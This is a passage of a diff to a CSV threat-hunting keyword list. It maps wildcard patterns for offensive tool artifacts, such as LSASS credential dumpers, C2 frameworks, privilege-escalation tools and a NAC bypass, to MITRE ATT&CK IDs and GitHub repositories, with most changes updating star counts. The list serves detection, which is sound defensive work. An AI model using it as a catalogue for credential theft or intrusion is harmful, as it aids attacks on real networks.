Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*MzHmO/Privileger*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*MzHmO/TGSThief*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*n00py/LAPSDumper*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*n00py/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*n1k7l4i/goMatrixC2*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*n1k7l4i/goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" "*n1nj4sec*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation 
tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nac_bypass*","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","229","62","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" "*nagios-root-privesc.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NamedPipeImpersonation.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*NamedPipeImpersonation.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*NamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" -"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 
","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*namespace WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*namp *--script *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation 
tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nanodump *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump -*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*nanodump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.git*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x64.exe*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*nanodump_pipe*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and 
control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanodump_ppl_dump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*nanodump_ssp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanodump_ssp.x64.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*nanodump-pipes*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*NanoDumpWriteDump*","offensive_tool_keyword","nanodump","The swiss army knife 
of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanorobeus*_cs.x64.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*_cs.x86.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*dump*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.cna*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanorobeus.x64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*nanorobeus.x86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus_brc4*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus-main*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*NativeEasyHook32.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*NativeEasyHook64.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
